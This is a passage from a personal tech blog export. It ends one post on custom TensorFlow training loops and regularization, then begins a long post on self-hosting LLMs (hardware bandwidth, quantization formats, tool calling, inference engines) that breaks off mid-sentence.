must ditch .fit() entirely and write a Custom Training Loop. This translates the exact theoretical mechanics we covered in Phase 3 directly into Python.\nThe Gradient Tape To manually execute the backward pass, you have to explicitly tell the GPU when to start tracking operations and hoarding activations in VRAM. TensorFlow handles this physical caching using a context manager called tf.GradientTape().\nWhen you open a Gradient Tape block, the framework actively monitors every single mathematical operation executed on a tensor. It builds the computational graph in real-time, caching the intermediate $A$ and $Z$ matrices (as discussed in Phase 3) specifically so it can calculate the local derivatives later. The exact millisecond you exit the with block, the forward pass is complete, and the tape is primed for the chain rule.\nExecuting the Math Once the forward pass is recorded and the final Total Loss scalar is calculated, you must explicitly command the tape to execute backpropagation.\nYou call tape.gradient(loss, model.trainable_weights). This single line of code is the physical manifestation of the chain rule. The hardware cascades backward through the cached VRAM states, calculating the exact partial derivative ($\\nabla L$) for every single parameter matrix in the network.\nFinally, you hand those calculated gradient vectors to the optimizer engine to physically alter the weights using optimizer.apply_gradients().\nThe Levers (Bare-Metal Control) Here is the exact code for a single, manual step of a custom training loop.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import tensorflow as tf # Assume \u0026#39;model\u0026#39; is an instantiated architecture, \u0026#39;optimizer\u0026#39; is Adam, # and \u0026#39;loss_fn\u0026#39; is Cross-Entropy. # 1. Isolate a single batch of tensors def train_step(images, labels): # 2. Open the physical VRAM cache with tf.GradientTape() as tape: # 3. The Forward Pass (activations are now actively cached) predictions = model(images, training=True) # 4. Calculate the Total Loss scalar for this specific batch loss = loss_fn(labels, predictions) # --- We have now exited the tape. The forward pass is locked. --- # 5. Backpropagation: Command the tape to execute the chain rule # This yields a list of gradient matrices perfectly matching the shape of the weight matrices gradients = tape.gradient(loss, model.trainable_weights) # 6. The Optimizer Engine: Physically alter the VRAM weights # We pair each calculated gradient with its corresponding weight matrix optimizer.apply_gradients(zip(gradients, model.trainable_weights)) return loss Why write this instead of just calling .fit()? Because it exposes every single mathematical lever in the pipeline.\nIf you are researching a highly specific architecture, you might not want the optimizer to update all weights equally. Inside a custom loop, you can intercept the gradients list before it hits the optimizer. You can mathematically clip the gradients, multiply specific layer gradients by a penalty scalar, or even inject custom noise directly into the backward pass vectors to force the model out of local minima. It grants you absolute, unrestricted control over the optimization physics.\nTroubleshooting and Refinement 1. The Bias-Variance Tradeoff Executing the calculus of backpropagation without crashing the GPU does not mean the model is successful; it just means the math compiled. The default state of a deep neural network is failure. A neural network must navigate the constant mathematical tension between learning too little and learning too much. We diagnose this strictly by observing the divergence of the training and validation loss curves over the course of the training loop.\nUnderfitting (High Bias) The physical reality: The model lacks the architectural capacity to map the complexity of the data manifold. It physically does not possess enough parameters, deep enough layers, or sufficient non-linear activation functions to twist its decision boundary around the data. It is mathematically rigid. The metric: When plotting the loss, the curve plateaus early. Both the training loss and the validation loss remain unacceptably high. The optimizer is physically incapable of driving the error down, regardless of how many epochs you force the GPU to compute. Overfitting (High Variance) The physical reality: The model has too much capacity. Instead of being forced to learn the underlying, generalized pattern, the GPU possesses enough parameter matrices to mathematically memorize the exact noise, anomalies, and statistical quirks of the specific training batches. The metric: The training loss drops perfectly and continuously toward zero. However, the validation loss hits a hard floor and then rapidly begins to climb. The model is becoming flawlessly accurate on the training data while catastrophically failing on unseen data. The divergence of these two lines is the exact moment the model stops learning and starts memorizing.\nThe Sweet Spot The entire goal of a training run is not to achieve zero error. It is finding the \u0026ldquo;sweet spot\u0026rdquo; the exact epoch where the validation loss curve reaches its absolute mathematical minimum before the variance takes over. Once that validation line begins to tick upward, any further GPU computation is actively destroying the model\u0026rsquo;s ability to generalize to reality.\n2. Regularization Techniques Overfitting is the default state of a high-capacity GPU. If you give a deep network enough parameters and enough time, it will always choose the mathematically lazy route of memorizing the training data instead of learning the complex, underlying rules. Regularization is the practice of actively sabotaging the network during the training loop to mathematically force it to generalize to unseen reality.\nDropout Layers (Network Sabotage) The most common structural regularization technique is the Dropout layer.\nDuring every single forward pass of the training loop, a Dropout layer physically disables a random percentage (20% or 50%) of the neurons in the preceding layer. It does this by multiplying their activation tensors by exactly zero.\nThis mathematically prevents \u0026ldquo;co-adaptation.\u0026rdquo; If neurons are constantly dropping offline, the network can no longer rely on one specific, highly tuned pathway to generate a prediction. It is physically forced to distribute its feature representations redundantly across the entire weight matrix. When evaluating the test set, dropout is turned off, and the resulting fully-active architecture is vastly more robust.\nWeight Decay Weight decay alters the fundamental calculus of the optimizer by modifying the loss function itself. Instead of just calculating the error of the prediction, the framework adds a mathematical penalty strictly based on the raw physical size of the weight matrices.\nL2 Regularization (Ridge): This adds a penalty proportional to the squared magnitude of the weights. The updated loss function looks like this: $$L_{total} = L_{error} + \\lambda \\sum w^2$$ This mathematically forces all weights to remain extremely small. If a single weight grows too large, the squared penalty explodes, generating a massive gradient that forces the optimizer to shrink it back down. It prevents any single feature from dominating the network\u0026rsquo;s logic. L1 Regularization (Lasso): This adds a penalty proportional to the absolute magnitude of the weights: $$L_{total} = L_{error} + \\lambda \\sum |w|$$ Unlike L2, which just shrinks weights, L1 violently forces non-critical weights to exactly zero. This creates a \u0026ldquo;sparse\u0026rdquo; matrix that mathematically ignores useless input features, effectively acting as an automated feature-selection mechanism. Early Stopping The simplest and most effective hardware intervention does not involve altering the architecture or the loss function; it simply cuts off the compute.\nEarly Stopping is a callback script that actively monitors the validation loss at the end of every epoch. The exact epoch where the validation loss stops dropping and begins to rise is the moment the model transitions from learning to memorizing. The script immediately halts the training loop, cuts off the GPU to save compute time, and physically reverts the VRAM back to the saved weights of that optimal, minimum-loss epoch.\n3. Hyperparameter Tuning Backpropagation and the optimizer automatically update the millions of weights inside the network. However, human engineers must define the macroscopic rules governing that optimization process: the learning rate ($\\alpha$), the batch size, the percentage of neurons dropped, and the physical count of layers and nodes. These are hyperparameters.\nBecause you cannot calculate a direct mathematical gradient to optimize a hyperparameter, finding the optimal architecture often devolves into guessing. To find the mathematical optimum scientifically, we must programmatically search the parameter space.\nGrid Search Grid Search is the most naive approach to hyperparameter tuning. You define a rigid, discrete matrix of possible values (e.g., learning rates of 0.01, 0.001, and 0.0001; batch sizes of 32, 64, and 128) and force the hardware to train a completely new model from scratch for every single combination.\nThe physical bottleneck is that Grid Search scales geometrically. Testing just 5 learning rates, 5 batch sizes, and 5 dropout rates requires executing 125 distinct training loops. If one loop takes 4 hours, the search takes 20 days. More critically, if a learning rate of 0.01 is mathematically doomed to explode the gradients on your specific dataset, Grid Search will blindly waste massive GPU cycles re-evaluating that exact same doomed learning rate across every single batch size variation.\nRandom Search Random Search abandons the rigid matrix. Instead of defining discrete steps, you define continuous bounds (e.g., any learning rate between 0.0001 and 0.1) and allow the script to randomly sample combinations.\nStatistically, Random Search is vastly superior to Grid Search. In deep learning, certain hyperparameters (like learning rate) have a massive impact on the loss, while others (like an exact dropout percentage) have a minor impact. By randomly sampling, the algorithm physically explores a much wider, more continuous variety of values for the critical variables, rather than getting locked into evaluating redundant combinations. It reliably discovers higher-performing models in a fraction of the total compute time.\nBayesian Optimization Both Grid and Random search are \u0026ldquo;dumb\u0026rdquo; algorithms; they do not learn from their past failures. If a combination yields a catastrophic loss, they simply move to the next iteration without adjusting their strategy.\nBayesian Optimization treats the hyperparameter search as a machine learning problem itself. It builds a probabilistic surrogate model (typically a Gaussian Process) to map the hyperparameter space.\nHere is how the mechanics work:\nThe script trains 3 to 5 initial models using random hyperparameter combinations. It evaluates their final validation loss metrics and feeds those numbers into the surrogate model. The surrogate model mathematically predicts which specific, untested combination of hyperparameters is most likely to yield a lower validation loss. The script trains the next model using only that highly probable combination, evaluates the result, and updates the surrogate model\u0026rsquo;s mathematical understanding of the space. Instead of guessing, the script actively guides the search away from doomed parameter spaces, intelligently hunting for the optimal setup and saving days or weeks of wasted hardware execution time.\nSummary This was a low level under the hood explanation of training with Deep Learning. I want to build on this for how to work with tensor flow more taking the low level ideas and implementing them in different projects but I have to play a little more with it so that I know what I am doing.\n","permalink":"https://blog.lukasmay.com/deep-dives/deep-learning/","summary":"\u003ch2 id=\"intro\"\u003eIntro\u003c/h2\u003e\n\u003cp\u003eThis is an attempt to cover what I know about DL to some degree. Some stuff is very skippable, and I don\u0026rsquo;t really remember everything that I put in here, so there might be some repeating, but not much.\u003c/p\u003e\n\u003ch2 id=\"the-foundations-of-deep-learning\"\u003eThe Foundations of Deep Learning\u003c/h2\u003e\n\u003cp\u003eTo understand how machine learning models work, you have to completely discard the idea that it \u0026ldquo;understands\u0026rdquo; anything. A model does not read text or see images. At the absolute lowest level, a neural network is just a massively complex sequence of mathematical operations executed on silicon. To feed data into that silicon, we must first translate reality into a format that a GPU’s compute cores can process. That translation layer is the tensor.\u003c/p\u003e","title":"Deep Learning"},{"content":"Overview I have been looking into self-hosting LLMs, and this is my attempt to put everything I\u0026rsquo;ve learned about the subject in one place (so I can stop forgetting things). Alongside that, I wanted to include information about the setup I use to self-host LLMs on my laptop and the steps I took to build and optimize it. While that will come in the future, as there are still some things I am changing, and this is long enough already, I removed some of those parts to put in the next section.\nThe end result of this project for me is a setup that integrates cloud AI with local LLMs to help with reverse engineering, coding, and general troubleshooting. This post\u0026rsquo;s goal is to inform you about much of what\u0026rsquo;s going on under the hood if you want to self-host LLMs and build workflows around them.\nBackground When it comes to self-hosting LLMs, for the most part, you could just download Ollama, install the models, and call it a day, but there are lots of moving pieces to consider if you want to go beyond that. The first thing to consider when self-hosting LLMs is which models you want to run, so you can build the best setup for them. To understand some of the things I am talking about in the model section, which will be more towards the end, we need to talk about hardware.\nHardware There are three main things to consider when looking at hardware for running LLMs: the size of the model that can run, prefill speed, and inference speed. In general, memory determines the size and therefore the smartness of the model you can physically run; memory bandwidth, combined with compute power, determines how fast the LLM that you run will be at both prefill and inference.\nNOTE: I am going to use chip as generic for CPU or GPU, as what I am talking about applies to both.\nMemory Bandwidth This is an important stat when evaluating hardware for running LLMs, given how models actually run on computers. You have the model\u0026rsquo;s weights, which need to be moved from memory to the chip. This means that, to compute one step of the process, a weight has to move from memory into the processor, be computed, and then be moved back out for the next iteration. The bottleneck can be either computing power or bandwidth. This also starts becoming an issue when talking about clustering machines together. To increase memory bandwidth, you can either widen the \u0026ldquo;road\u0026rdquo; (bus width/channels), increase the speed of traffic (frequency/transfer rate), or shorten the distance data travels (integration/stacking).\nWidening the road means adding more wires to transfer data between the two devices. More wires mean more parallel processing because there are more roads for traffic. But when you increase the number of channels, you also need to add more unified memory controllers (UMCs) on the chip to keep up with the new channels.\nThe second option is to increase traffic speed. This essentially reduces the time between electrical signals on each line. To accomplish this, you need better signal integrity, along with chipsets directly in memory to help control voltage and sync timing, such as Power Management Integrated Circuits (PMICs) and Clock Drivers (CKDs). These help ensure that the data is not degraded when it is sent closer together. Another thing that can increase the \u0026ldquo;speed limit\u0026rdquo; is changing the data encoding used across the wire. Two things are happening here: line encoding and signal density. Line encoding, I am not going to get into here, but essentially, the important part is reducing overhead, meaning sending more data with less packaging. Signal density is increasing the amount of data sent at every clock cycle across one channel by not using 1s and 0s, but instead using multiple voltage levels, effectively sending more data in one electrical signal.\nThe third thing you can do to increase memory bandwidth is to shorten the road (much more complicated than you think). The first reason to do this comes down to two things: shorter wire means less distance to travel and therefore faster trip times, and two, the longer the wire, the more it acts like a capacitor, meaning lower frequencies for sending data due to it taking longer for electrical signals to leave the wire. To accomplish this in hardware, newer chips essentially stack the memory vertically so they don\u0026rsquo;t have to be flat on the board. That is called High Bandwidth Memory (HBM), which requires Through-Silicon Vias (TSVs) to connect the layers together. Modern chips are really multiple chiplets connected by the motherboard. Motherboards are made of fiberglass, which doesn\u0026rsquo;t allow for the small connections needed to stack memory in HBM. So there is a piece of silicon called the interposer that connects them, allowing for the stacking of memory. That process is called Chip-on-Wafer-on-Substrate (CoWoS). The next step to make the path shorter is to combine the CPU and GPU memory, called unified memory (Mac uses this). This reduces the distance not only from the CPU or GPU, and its memory, but also between the CPU and GPU. The next steps chips are taking are building the CPU or GPU cores into the memory, with the memory scattered throughout, putting the memory and processing power right next to each other (not happening yet).\nSo to sum it up, memory bandwidth is determined by the number of channels between the memory and the chip, how quickly data can transfer over those channels, and how short those channels are. Memory bandwidth, in most cases, is the bottleneck for inference (writing speed).\nCompute Power Another factor to consider is how powerful the chip is at computing matrix multiplication (MatMul). One of the reasons the CPU is worse for these operations compared to a GPU is that a CPU is built of a couple of very complex cores that can handle lots of different things one at a time super fast, while a GPU is built of lots of specialized cores that are slower but, due to architecture, can compute simultaneously while also being smaller. Inside the GPU, there are several different types of cores for performing different tasks. When it comes to MatMul, the tensor core is the specialist. Every time you send a prompt, the GPU must multiply your input against billions of parameters, meaning billions of MatMuls.\nThe tensor core is much faster at MatMuls because it can perform the entire operation in a single cycle, whereas other cores would need to break it down into multiple steps. This process, called Matrix Multiply-Accumulate (MMA), can compute the equation D = A × B + C, which is the math required when running models. There are also multiple sizes of tensor cores for different data sizes, i.e., different model weight precisions.\nBesides the tensor cores themselves, another hardware operation is used to run LLMs faster. Sparsity, as discussed in the model section, requires hardware to skip the 0 operations the model has baked in when working with fine-grained structured sparsity. This hardware can be called sparse tensor cores.\nThe CPU also plays a role in running the model, even if it isn\u0026rsquo;t doing the heavy lifting. The CPU is responsible for fetching data from memory into the GPU\u0026rsquo;s vRAM. If you have a fast enough CPU, you can also run models that don\u0026rsquo;t fully fit in vRAM by running some calculations on the CPU. In MoE models, the CPU determines the routing for assigning weights to the GPU. Additionally, the CPU is what can tokenize your input and de-tokenize the output (at least part of the process). The CPU is also in charge of managing the KV cache.\nWhen it comes to computing power, the GPU is the workhorse that can plow through billions of MatMuls quickly, but the CPU still needs to be powerful enough to feed the GPU with data and handle other management tasks when running LLMs. There are also many tricks with models for improving performance that the hardware needs to be built to take advantage of.\nMemory Really, this section comes down to speed again. When using GPUs, the fast memory is called vRAM, so how much vRAM you have determines how large a model you can fit on your computer without seeing massive drop-offs in speed. This is due to slower memory bandwidth when communicating between the CPU and the GPU. This is one of the reasons that Apple\u0026rsquo;s unified memory is so good at running LLMs. You have access to more memory that has high memory bandwidth to the GPUs. When talking about how large a model you can run, it comes down to how much memory you have with high-bandwidth access to the fast compute cores. This, in most cases, comes down to vRAM or Apple Silicon\u0026rsquo;s unified memory architecture.\nNOTE: You can split a model between vRAM and normal memory in some special cases to fit larger models. That process is called sharding.\nLandscape of Hardware This is only important if you are considering buying hardware to run LLMs; otherwise, you are just working with what you have, which is why I am not going deep into this topic. There are really four options for running your own LLMs with hardware.\nGPU builds in a PC (RTX 5090s) Prebuilt desktop designed for AI (NVIDIA Spark) Apple silicon Renting much more powerful hardware in a datacenter Unified Memory is what Apple uses in their chips. Essentially, the memory is accessible to both the CPU and the GPU simultaneously, meaning two things primarily. You can fit much larger models than with traditional GPUs, and you can do some special computational acceleration.\nModels When we talk about running an LLM, we are effectively running a static file containing a snapshot of intelligence. Unlike traditional software, which is logic-based, a model is probabilistic. It doesn\u0026rsquo;t \u0026ldquo;know\u0026rdquo; anything in the traditional sense; instead, it predicts the next piece of information based on the patterns it learned during training.\nAnatomy of a Model To understand why these files are so large and require such massive bandwidth to run, we need to break down the physical composition of a Large Language Model. When you download a model, whether it is a 70B parameter Llama 3 or a 671B DeepSeek, you are essentially downloading a massive, serialized dictionary of matrices (tensors) and a configuration file that tells the inference engine how to stitch them together.\nAt the lowest level, the \u0026ldquo;file size\u0026rdquo; on your disk is dominated by the Weights (or parameters). When we say a model has \u0026ldquo;70 Billion Parameters,\u0026rdquo; we mean it contains 70 billion individual floating-point numbers that represent the strength of connections between neurons. In a standard unquantized FP16 model, each parameter is a 16-bit floating-point number taking up 2 bytes of memory, meaning a 70B model requires roughly 140 GB of vRAM just to load. These weights are grouped into multi-dimensional arrays called tensors; for example, a single layer might have a weight tensor of size [8192, 8192]. To run the model, your GPU must move these massive tensors from VRAM into the compute cores to perform matrix multiplication against your input, which is why memory bandwidth is the primary bottleneck for inference speed.\nIf the weights are the fuel, the Architecture is the engine block. Almost all modern LLMs utilize the Transformer architecture, which consists of a stack of identical blocks repeated dozens of times a 70B model might have 80 of these layers. Inside each layer are Attention Heads and Feed-Forward Networks (FFN). The Attention Heads allow the model to understand context by comparing the current token to every previous token in your prompt, while the FFN is a massive dense network where the \u0026ldquo;knowledge\u0026rdquo; is processed. In dense models, every token passes through the entire FFN, whereas Mixture of Experts (MoE) models break this FFN into smaller \u0026ldquo;experts\u0026rdquo; to save compute. These layers are interspersed with Normalization (e.g., RMSNorm) to keep the numerical values stable as they propagate deeper into the network.\nWhile not part of the downloaded file, the KV Cache (Key-Value Cache) is a critical component of the model\u0026rsquo;s runtime architecture. When you feed a prompt into the model, it calculates the attention values for those tokens once and stores them in VRAM so it doesn\u0026rsquo;t have to recalculate them for the next word. This cache grows linearly with your context length. If you have a massive 128k context window, this \u0026ldquo;temporary\u0026rdquo; memory can easily consume more VRAM than the model weights themselves, often causing Out of Memory (OOM) errors even if the model initially loads fine.\nFinally, the Tokenizer acts as the interface between you and the weights. Models cannot read English; they only understand numbers. The tokenizer breaks your text into chunks called \u0026ldquo;tokens,\u0026rdquo; which can be words, parts of words, or spaces, and assigns each one a unique ID number based on a fixed vocabulary (e.g., 128,000 unique tokens). A more efficient tokenizer can represent complex words in fewer tokens, effectively increasing your context window and generation speed.\nModel File Types The extension on the file you download dictates how the inference engine interacts with these weights. Safetensors (.safetensors) is the industry-standard \u0026ldquo;raw\u0026rdquo; format, developed by HuggingFace to replace the insecure Python \u0026ldquo;Pickle\u0026rdquo; files. It is designed for speed using \u0026ldquo;memory mapping,\u0026rdquo; which allows the operating system to point the model directly to the file on the hard drive without first copying the data into RAM. This structure, a header describing the data followed by a massive byte-stream of raw numbers, makes loading massive models nearly instant on fast storage.\nFor self-hosting on consumer hardware, specifically via llama.cpp, you will use GGUF (.gguf). Unlike Safetensors, which often requires separate configuration files, GGUF is a binary format that packs the weights, architecture definition, quantization tables, and tokenizer into a single executable-ready file. It is specifically optimized for Apple Silicon and CPU inference, utilizing block-based quantization tables that allow the hardware to decode compressed weights on the fly with minimal overhead.\nAWQ / GPTQ: These are specialized formats optimized for running quantized models on NVIDIA GPUs. They pack the weights so they align perfectly with the GPU\u0026rsquo;s memory layout for faster access. Stuff happens here.\nQuantization If weights and architecture are the anatomy of the model, Quantization is the compression algorithm that makes them portable. It is arguably the single most important concept for self-hosting because it is the only reason we can run 70B-parameter models on consumer hardware rather than requiring $30,000 enterprise-grade cards.\nAt a high level, quantization is the process of reducing the precision of the numbers used to represent the model\u0026rsquo;s parameters. Most models are trained in FP16 (16-bit Floating Point) or BF16 (Brain Float 16). In this format, every single weight requires 16 bits (2 bytes) of memory. This offers incredible precision, allowing for tiny nuances in the values, but it is computationally expensive and memory-hungry. Quantization takes that high-precision range and maps it to a lower-precision grid, typically INT8 (8-bit integer) or INT4 (4-bit integer).\nThink of this like resizing a high-resolution raw image into a JPEG. You are technically throwing away data, pixel-perfect color accuracy is lost, but if done correctly, the human eye (or in this case, the model\u0026rsquo;s reasoning capability) can\u0026rsquo;t tell the difference. The \u0026ldquo;magic\u0026rdquo; of modern quantization is that neural networks are surprisingly resilient to this noise. You can often reduce the information by 75% (from 16-bit to 4-bit) while losing less than 1% of the model\u0026rsquo;s intelligence.\nThe Mechanics of Precision To understand how this works, you have to look at how the numbers are stored. In a standard 4-bit quantization, we restrict the model to only 16 possible values (since 4 bits can only represent 0-15) to approximate the infinite range of a floating-point number.\nWe achieve this using a Scale Factor and a Zero Point. Instead of storing the actual weight value, we store a tiny integer and a separate scaling constant that tells the GPU how to \u0026ldquo;unpack\u0026rdquo; that integer back into a jagged approximation of the original number during calculation. This is why you will often see \u0026ldquo;groups\u0026rdquo; or \u0026ldquo;blocks\u0026rdquo; mentioned in quantization settings (e.g., group size 128). The model doesn\u0026rsquo;t just squash the entire 70B parameter set with a single scale factor; it splits the weights into small blocks (usually 32 or 128 weights) and computes a separate scale for each block. This localized precision allows the model to handle sensitive layers with high variance without degrading the rest of the network.\nSmart Quantization: K-Quants and Importance Not all parameters in a model are created equal. Some weights are \u0026ldquo;load-bearing\u0026rdquo;—they are critical for the model\u0026rsquo;s logic and syntax—while others are effectively noise. If you aggressively quantize the important weights, the model becomes lobotomized (perplexity increases). If you leave the useless weights at high precision, you are wasting vRAM.\nThis is where modern formats like GGUF and its K-Quants (K-series) come into play. When you see a file labeled Q4_K_M, it isn\u0026rsquo;t just a flat 4-bit truncation. It uses a smart, mixed-precision approach called superblocking. The \u0026ldquo;K\u0026rdquo; refers to the specific quantization algorithm (often k-means clustering) that optimizes the assignment of these quantization levels. In a Q4_K_M model, the attention mechanisms (the most sensitive part of the brain) might be kept at 6-bit precision, while the feed-forward layers (the bulk storage) are dropped to 3-bit or 4-bit. This allows you to fit a massive model into a smaller vRAM footprint while keeping the \u0026ldquo;smart\u0026rdquo; parts sharp.\nActivation-Aware Quantization (AWQ) While GGUF is king for Apple Silicon and CPU inference, AWQ (Activation-aware Weight Quantization) has become the standard for high-performance GPU serving. The breakthrough of AWQ was the realization that you shouldn\u0026rsquo;t just look at the weights to decide what to compress, you should look at the activations.\nDuring quantization, AWQ feeds a small amount of calibration data into the model to identify which weights actually \u0026ldquo;light up\u0026rdquo; or activate most during inference. It identifies the 1% of salient weights that are crucial for performance and protects them, keeping them in higher precision or scaling them differently, while aggressively compressing the other 99%. This results in models that are significantly faster and more accurate than older methods (like GPTQ) because they preserve the specific pathways the model uses to think, rather than just the static weight map.\nKV Cache Quantization Finally, we have the new frontier: KV Cache Quantization. Traditionally, even if you compressed your model weights to 4-bit, the runtime memory (the context window) was still stored in massive FP16. For a long conversation, this temporary memory could easily grow larger than the model itself. New techniques now allow us to quantize this temporary cache into FP8 or even INT4. This creates a slight degradation in \u0026ldquo;recall\u0026rdquo; (the model might forget a specific detail from 100 pages ago), but it allows for massive context windows, effectively letting you fit a 128k token context into the same space that used to hold only 8k.\nTool Aware Models If standard LLMs are the \u0026ldquo;brains\u0026rdquo; that think and reason, Tool-Aware (or Function-Calling) models are the brains connected to the hands. A standard base model is effectively trapped in a text-only box. It can tell you how to check the weather, but it cannot actually check it. Tool-aware models bridge this gap, transforming the LLM from a passive chatbot into an active agent that can interact with your operating system, APIs, and local files.\nThe Mechanism: Function Calling At a technical level, \u0026ldquo;using a tool\u0026rdquo; is really just a structured game of fill-in-the-blanks. When you load a tool-aware model, you don\u0026rsquo;t just send it a user prompt; you also send it a list of available functions (tools) defined in a schema (usually JSON via MCP).\nFor example, you might provide a tool definition for get_current_weather(location: string). If you ask the model, \u0026ldquo;What\u0026rsquo;s the weather in Paris?\u0026rdquo;, a standard model would hallucinate an answer or say, \u0026ldquo;I don\u0026rsquo;t know.\u0026rdquo; A tool-aware model, however, detects that the user\u0026rsquo;s intent matches one of its available tools. Instead of generating conversational text, it flips a switch and generates a Structured Output, typically a JSON block looking like {\u0026quot;function\u0026quot;: \u0026quot;get_current_weather\u0026quot;, \u0026quot;parameters\u0026quot;: {\u0026quot;location\u0026quot;: \u0026quot;Paris\u0026quot;}}.\nThe Agentic Loop It is important to understand that the model itself does not run the code. It simply writes the request. The \u0026ldquo;magic\u0026rdquo; happens at the orchestration layer (the software running the model, such as Ollama, vLLM, or LangChain).\nReasoning: The model analyzes the prompt and decides it needs external data. It outputs the specific \u0026ldquo;Tool Call\u0026rdquo; token and the JSON command. Execution (The Pause): The inference engine detects this stop token, pauses the model generation, and takes that JSON payload. It executes the actual Python script or API call on your machine. Observation: The engine takes the return value of that function (e.g., \u0026ldquo;Temp: 15°C, Rainy\u0026rdquo;) and feeds it back into the model\u0026rsquo;s context window as a \u0026ldquo;Tool Result.\u0026rdquo; Response: The model \u0026ldquo;wakes up,\u0026rdquo; sees the result of the tool it requested, and uses that new fact to generate the final answer for the user. Key Distinction: While you can prompt almost any model to output JSON, true Tool Aware models (like Llama 3.1, Hermes, or Command R) are fine-tuned specifically on massive datasets of function interactions. They are significantly less likely to hallucinate nonexistent parameters or to mess up JSON syntax, which is critical for building reliable automated workflows.\nArchitectures: Dense vs. Mixture of Experts (MoE) The architecture of a model determines how efficiently it turns raw parameters into intelligence. Dense Models, like Llama 3 or GPT -3, represent the traditional approach to AI architecture. In these models, every single parameter is active for every single token generated. It is effectively a brute-force method in which the entire neural network is used to answer even the simplest query. While this ensures consistency, it comes with a steep cost in compute and memory bandwidth, as your hardware must move the entire weight set through the GPU cores for every word produced.\nMixture of Experts (MoE) models, such as Mixtral, Qwen, or DeepSeek, introduce sparsity to address this efficiency problem. Instead of a single, monolithic neural network, the model is split into smaller subnetworks, known as \u0026ldquo;experts.\u0026rdquo; A router layer sits at the front of the process, analyzing each token and activating only the specific experts needed for that concept, perhaps one expert for syntax and another for factual recall. This architecture creates a massive disconnect between file size and run cost. An MoE might have 47 billion total parameters on disk, but only use 13 billion active parameters during inference. This gives you the broad knowledge base of a massive model with the speed and responsiveness of a much smaller one.\nThe Impact of Size and Scaling Laws When we talk about model size, we are really talking about the capacity for complexity. Parameters function as storage slots for patterns, and the number of parameters dictates how deep those patterns can go. Smaller models, typically under 10 billion parameters, have sufficient capacity to master English grammar, basic facts, and surface-level instruction-following. They are excellent for summarization but often lack the depth to handle multi-step logic without losing the thread of the conversation.\nAs you scale up to the 30B and 70B parameter range, you start to see emergent behaviors in reasoning. This is the threshold at which models move beyond simple pattern matching and begin to understand nuance, solve logic puzzles, and handle complex coding tasks with significantly fewer hallucinations. They can maintain a coherent train of thought over much longer conversations. Once you push past the 100B parameter mark, the model gains deep world knowledge and the ability to generalize across domains it wasn\u0026rsquo;t explicitly trained on, though this comes with the hardware cost mentioned earlier.\nModel Specializations It is also critical to understand that not all models are trained for the same purpose. The raw output of a training run is called a Base Model. These are not chatbots; they are text completion engines designed to predict the next word in a sequence. If you ask a base model a question, it is just as likely to generate five more questions as it is to answer you, because it views the input as a pattern to be continued rather than a query to be resolved. These are generally useless for standard chat applications but are the preferred foundation for researchers fine-tuning their own datasets.\nFor almost all practical applications, you will want an Instruct or Chat model. These are base models that have undergone Reinforcement Learning from Human Feedback (RLHF) to understand the \u0026ldquo;User asks, Assistant answers\u0026rdquo; dynamic. Beyond standard chat, we are now seeing the rise of Reasoning Models (like DeepSeek R1), which are trained with Chain of Thought data to \u0026ldquo;talk to themselves\u0026rdquo; and error-check their logic before responding, and Coding Models, which are fine-tuned on massive repositories of code to understand syntax and edge cases that general models often miss.\nSummary Models are very complex. There are dense models and a mixture of expert models. Quantization is just shrinking models to fit on worse hardware without losing too much of the model\u0026rsquo;s ability. The model is really just a bunch of weights and some instructions on what they mean or how to work with them. There is not one format for models to be stored, quantized, built, or run.\nInference Engine So far the hardware that runs the models and the models themselves have been explained (mostly). The inference engine is what ties these to together. It is responsible for running the model at the software level. Inference engines are responsible for loading the model, managing memory, scheduling requests, and executing MatMul. All the speed tricks in the models and on the hardware need the inference engine be able to use them in-order to gain the massive benefits that they provide.\nWorkflow Execution To run a model the inference engine needs to follow several steps to go from input prompt to output.\nLoad the model from disk into memory if not already there Tokenization: Convert your input text into tokens ie turn text into numbers Prefill: Builds initial KV cache from your prompt. Computationaly heavy but only happens once Decode: This is the generation part. The engine loops generating one token at a time. Detokenization: Takes the tokens generated and turns them back into words Memory Management One of the optimizations when it comes to memory management is Paged Attention. The problem that is solves is the allocation of the KV cache to be more dynamic and granular instead of setting aside one large contiguous space in vRAM it uses blocks. This means you have dynamic allocation and on demand growth for context size. This leads to much less waisted space if you have multiple queries running simultaneously.\nWith this you also gain more throughput by having more granular control. If one part of the process finishes first the memory can be freed up for the next step in the process instead of needing to wait for the whole section to complete before moving on. This really only applies to multiple requests simultaneously from the user although with more agentic workflows that is the reality of what is happening under the hood. That process is called Continuous Batching although it requires page attention to work.\nAnother benefit of Page Attention is memory sharing. If you ask the LLM to come up with multiple solutions the inference engine can store the prompt tokens in one place and use them for all three iterations with the model saving massively on space. Also if you want your LLM to try different options the different branches can use the same technique to store their shared context via a process called Beam Search. If there are any changes that need to happen to the shared KV cache you just copy the block that is different keeping the rest shared leading to massive space saving results.\nParallelism This is the process of splitting up the model across multiple GPUs. When done correctly this gives you more compute and memory bandwidth making the process faster while also giving you more space to fit a model in the fast vRAM of the combined GPUs. For the most part there are two types of parallelism: Tensor parallelism, and pipeline parallelism.\nTensor Parallelism essentially splits a models layer across multiple GPUs. This method allows all the compute power of the GPUs to work on the same step of the inference process at the same time. In this process all the GPU cores need to sync backup in between each layer. The math that is actually split is the matrix itself but the summing part of the equation is what needs to be synced across all the cores. This means that high bandwidth is critical as there is a lot of communication in between each chip. Pros of this setup is single user generation speed. Cons are you need really fast connection speeds to make sure that the GPUs are all getting saturated.\nPipeline parallelism splits the model vertically between GPUs. Meaning different layers are on different GPUs. The reason todo this is if you need a larger model that won\u0026rsquo;t fit on one GPU and the memory bandwidth is not great. The reason for this is that only one GPU will actually be working at a time but it does decrease the amount of communication the GPUs need todo to function together.\nIn data centers both tensor and pipeline parallelism are used in conjunction to link GPUs in a rack together and then different server racks together respectively.\nHardware Translator The models just contain the weights of the model but the hardware needs the instructions on what todo with those numbers. The inference engine pieces of code that know how to interact with the hardware drivers to tell the GPU how to compute the results. This means that the inference engine has to know the best way to utilize the hardware that it is running on in-order to get the best results as hardware differs.\nThe optimizations that can be made here are mainly what instructions the engine sends to the GPU and the best choice for that depends on all the aspects of the hardware that is being used. So getting the inference engine to run optimally requires a lot of testing and research about what the best hardware instructions work for the hardware currently in use. The brand of hardware also changes what functions are available.\nParameters While each inference engine has different parameters there are some general controls that are good to know exist. There are two general categories of parameters the load time parameters which control how the model is loaded into the hardware and handles the memory and runtime/sampling parameters which control behavior of the output.\nFlags for these parameters are different depending on the engine so I am not going to list the specific flag names\nFor load time parameters one of the main ones to work with is the flags for controlling the 